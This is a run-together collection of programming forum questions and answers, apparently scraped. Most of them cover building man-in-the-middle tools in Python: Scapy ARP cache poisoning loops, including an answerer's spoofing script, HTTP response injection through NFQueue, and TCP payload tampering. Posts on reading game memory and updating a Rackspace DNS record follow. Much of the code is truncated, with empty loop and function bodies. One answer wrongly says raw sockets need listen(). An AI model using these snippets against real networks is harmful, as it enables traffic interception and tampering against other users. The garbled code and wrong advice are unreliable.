I've lately been trying to build a "Man in The Middle" using Python and Scapy (for my own practice, no malicious purposes).
I started off with writing code to create a dos, however for some reason it's acting strangely.
First of all, for some reason, when I run it on my Windows PC, the arp entry never changes. I've even gone as far as clearing the arp table (arp -d *), yet still the real mac address of the gateway returns.
Secondly, the code seems to work on my phone only partially - when opening websites, it just takes a long while. Also some websites seem unaffected (Instagram works...).
Also, running the code against different brands of phones resulted in different results.
Could it be that there are security measures on the different devices? Did I do something wrong?
Here is the code, thanks for the help!
from enum import Enum
import getmac
import netifaces
from scapy.all import ARP, Ether, sendp
class DeviceIps(Enum):
MyPhone = ''
MyPc = ''
class Device(object):
def __init__(self, ip: str):
self.ip = ip
def get_mac_from_ip(ip=None):
return getmac.get_mac_address(ip=ip)
def build_poison_packet(victim_ip):
FAKE_MAC_ADDRESS = 'aa:bb:cc:dd:ee:ff'
gateway_ip_address = netifaces.gateways()['default'][netifaces.AF_INET][0]
victim_mac_address = get_mac_from_ip(victim_ip)
poison_packet = Ether(src=FAKE_MAC_ADDRESS, dst=victim_mac_address) \
/ ARP(psrc=gateway_ip_address, # -> Address to lie about
hwsrc=FAKE_MAC_ADDRESS, # -> Mac address to direct to
hwdst=victim_mac_address, pdst=victim_ip, op=ARP_RESPONSE_CODE)
return poison_packet
def poison(target: Device):
poison_packet = build_poison_packet(target.ip)
while True:
def main():
Here's simple scapy code that send arp reply to victim and host (gateway) address.
You can clean up the both victim and host arp table before your script is terminated.
#!/bin/env python
from scapy.all import Ether, ARP, sendp
import time
victim_hw_addr = "34:e1:2d:83:20:aa"
victim_ip_addr = ""
gw_hw_addr = "ce:9f:7a:7b:d7:aa"
gw_ip_addr = ""
my_hw_addr = "8c:85:90:c3:0b:aa"
tmout = 100
arp4victim = Ether(dst=victim_hw_addr, src=my_hw_addr) / ARP(pdst=victim_ip_addr, hwdst=victim_hw_addr, psrc=gw_ip_addr, hwsrc=my_hw_addr, op=2)
arp4gw = Ether(dst=gw_hw_addr, src=my_hw_addr) / ARP(pdst=gw_ip_addr, hwdst=gw_hw_addr, psrc=victim_ip_addr, hwsrc=my_hw_addr, op=2)
while True:
print "*"
I'm trying to construct a man in the middle attack on a webpage (i.e. HTTP traffic). I'm doing this by using a Linux machine attached to Ethernet and a client attached to the Linux box via its WiFi hotspot.
What I've done so far is use NFQueue from within the IPTables Linux firewall to route all TCP packets on the FORWARD chain to the NFQueue queue, which a Python script is picking up and then processing those rules. I'm able to read the data off of the HTTP response packets, but whenever I try to modify them and pass them back (accept the packets), I'm getting an error regarding the strings:
Exception AttributeError: "'str' object has no attribute 'build_padding'" in 'netfilterqueue.global_callback' ignored
My code is here, which includes things that I've tried that didn't work. Notably, I'm using a third-party extension for scapy called scapy_http that may be interfering with things, and I'm using a webpage that is not being compressed by gzip because that was messing with things as well. The test webpage that I'm using is here.
from scapy.all import *
#nfqueue import
from netfilterqueue import NetfilterQueue
#scapy http extension, not really needed
import scapy_http.http
#failed gzip decoding, also tried some other stuff
#import gzip
def print_and_accept(packet):
#convert nfqueue datatype to scapy-compatible
pkt = IP(packet.get_payload())
#is this an HTTP response?
if pkt[TCP].sport == 80:
#legacy trial that doesn't work
#data = packet.get_data()
print('HTTP Packet Found')
#check what's in the payload
stringLoad = str(pkt[TCP].payload)
#deleted because printing stuff out clogs output
#we only want to modify a specific packet:
if "<title>Acids and Bases: Use of the pKa Table</title>" in stringLoad:
print('Target Found')
#strings kind of don't work, I think this is a me problem
#stringLoad.replace('>Acids and Bases: Use of the pK<sub>a</sub>', 'This page has been modified: a random ')
#pkt[TCP].payload = stringLoad
payload_before = len(pkt[TCP].payload)
# I suspect this line is a problem: the string assigns,
# but maybe under the hood scapy doesn't like that very much
pkt[TCP].payload = str(pkt[TCP].payload).replace("Discussion", "This page has been modified")
#recalculate length
payload_after = len(pkt[TCP].payload)
payload_dif = payload_after - payload_before
pkt[IP].len = pkt[IP].len + payload_dif
#recalculate checksum
del pkt[TCP].chksum
del pkt[IP].chksum
del pkt.chksum
print('Packet Modified')
#this throws an error (I think)
#no clue if this works or not yet
#goal here is to reassign modified packet to original parameter
#this was also throwing the error, so tried to move away from it
#bunch of legacy code that didn't work
#decompressed_data = zlib.decompress(str(pkt[TCP].payload), 16 + zlib.MAX_WBITS)
# print(pkt.getlayer(Raw).load)
#print('HTTP Contents Shown')
def GET_print(packet1):
ret = "***************************************GET PACKET****************************************************\n"
ret += "\n".join(packet1.sprintf("{Raw:%Raw.load%}\n").split(r"\r\n"))
ret += "*****************************************************************************************************\n"
return ret
print('Test: Modify a very specific target')
print('Program Starting')
nfqueue = NetfilterQueue()
nfqueue.bind(1, print_and_accept)
print('Packet Interface Starting')
except KeyboardInterrupt:
print('\nProgram Ending')
Apologies in advance if this is hard to read or badly formatted code; Python isn't a language that I write in often. Any help is greatly appreciated!
After trying to break down code from GitHub and find any youtube videos that talk about this I'm starting to give up, so I'm hoping one of you can please help me. All I want to be able to do is monitor a games memory addresses value. For example, let's say in the game Minecraft the health value and the memory address is:
Address: 001F6498
Value: 20
How do I turn this value into a variable in Python?
Code Thought Process:
import pywin32
pid = 5601
address = 001F6498
ReadProcessMemory(pid, address):
#In this example i would like it to print 20
You need to get a handle to the process first. Here is some code that does so using OpenProcess() FindWindow() and GetWindowThreadProcessId() to get the handle to the process. Also included is a little function to properly read the correct size variable and store it correctly. This method can be used to read pointers, utilizing "i" to denote an integer type.
import win32api
import win32gui
import win32process
from ctypes import *
from pymem import *
ReadProcessMemory = windll.kernel32.ReadProcessMemory
def read_memory(procId, address, type):
buffer = (ctypes.c_byte * getlenght(type))()
bytesRead = ctypes.c_ulonglong(0)
readlenght = getlenght(type)
ReadProcessMemory(procId, address, buffer, readlenght, byref(bytesRead))
return struct.unpack(type, buffer)[0]
hWnd = win32gui.FindWindow(0, ("WINDOW NAME HERE"))
handle = pymem.Pymem()
procBaseAddress = handle.process_base
hProc = windll.kernel32.OpenProcess(PROCESS_ALL_ACCESS, 0, pid[1])
value = ReadProcessMemory(hProc, ADDRESS_OF_VARIABLE_TO_READ, "i")
Credits to a friend, puppetmaster, who taught me how to do this
I try to develop a MITM attack tool, first tried arp poisoning, then sniffing and filter specific packet (both of them with scapy)
if there is a match with my filter I need to alter it on the fly so, create a copy of this packet then manipulate TCP data and send it.
But the last step doesn't work. Does it correct manipulate for copying packet?
from netfilterqueue import NetfilterQueue
from scapy.all import *
from scapy.error import Scapy_Exception
import os
import sys
import threading
import signal
def Inspector (packet):
if packet[TCP].payload :
tcp_data = str(packet[TCP].payload)
if 'Open' in tcp_data:
packet_data = tcp_data.split('(')
a= copy.deepcopy(packet) # First Copy The packet
packet.drop() # Second Drop it
if 'Up' in tcp_data :
payload_O = packet_data[0] + '(' + 'Down//inject'
a[TCP].data = payload_O
else :
def main():
print '[*] Starting Queue '
sniff(filter="tcp port 2626", prn=inspector, store=0)
if __name__ == "__main__":
It is not possible to intercept a packet using scapy. What your code might do is send another packet following the original one.
The best way to create a MITM tool is by ARP poisoning. You can have a look at scapy tutorials such as in:
The scapy official doc
This good tutorial at medium.com
Of course, your tool will only be used in a security purpose, as you know that such pratice is illegal
I am trying to read an ARP request with my python script which is on my computer that is running Ubuntu 14.04. Wireshark shows that I AM receiving the ARP requests but I am not able to read it with python. I am not sure if the problem is in my computer or not, but I think that somehow the problem is in my computer and not the script.
I am running this script with sudo python "..../name.py"
This is my python script so far:
import dpkt
import socket
import binascii
import time
def to_Readble(addr):
for i in xrange(12/2):
return r
def to_Sendable(r):
for i in xrange(6):
return addr
def buildARP(src_mac, src_ip, to_mac, to_ip):
arp_p = dpkt.arp.ARP()
arp_p.sha = to_Sendable(src_mac) #add configure
arp_p.spa = socket.inet_aton(src_ip)
arp_p.tha = to_Sendable(to_mac) #add configure
arp_p.tpa = socket.inet_aton(to_ip)
arp_p.op = dpkt.arp.ARP_OP_REPLY #reply
packet = dpkt.ethernet.Ethernet()
packet.src = to_Sendable(src_mac)
packet.dst = to_Sendable(to_mac)
packet.data = arp_p
packet.type = dpkt.ethernet.ETH_TYPE_ARP
return packet
raw_sock=socket.socket(socket.PF_PACKET, socket.SOCK_RAW,socket.htons(0x0003))#changed ver
raw_sock.bind(("eth0", dpkt.ethernet.ETH_TYPE_ARP))
#dns_sock=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print my_mac
print "running"
while 1:
for i in ip_macs.keys():#sending stuff
# raw_sock.recv(1024) Blocks the script!!!!***!!!
data = raw_sock.recv(1024)
print "got arp"
Someone has an Idea for why I am not getting the requests?
You need socket.listen() after the socket.bind().
Rather that repeat other answers, see this So Answer:
(Very) basic Python client socket example
I am trying to update my rackspace dns with my IP using a python script.
My script works when I manually enter an IP in it, but dosen't when I get it from the outside, why?
#!/usr/bin/env python
import clouddns
import requests
r= requests.get(r'http://curlmyip.com/')
ip= ''
dns = clouddns.connection.Connection('******','********************')
domain = dns.get_domain(name='reazem.net')
record = domain.get_record(name='ssh.reazem.net')
record.update(data=ip, ttl=600)
#!/usr/bin/env python
import clouddns
import requests
r= requests.get(r'http://curlmyip.com/')
**ip= '{}'.format(r.text)**
dns = clouddns.connection.Connection('******','********************')
domain = dns.get_domain(name='reazem.net')
record = domain.get_record(name='ssh.reazem.net')
record.update(data=ip, ttl=600)
Note: print '{}'.format(r.text) succesfully outputs my ip.
Helping you helping me: I just noticed that print '{}'.format(r.text) adds an extra line, how do I avoid that?
For those interested: https://github.com/rackspace/python-clouddns
Try ip = r.text.strip() to remove the extra newline.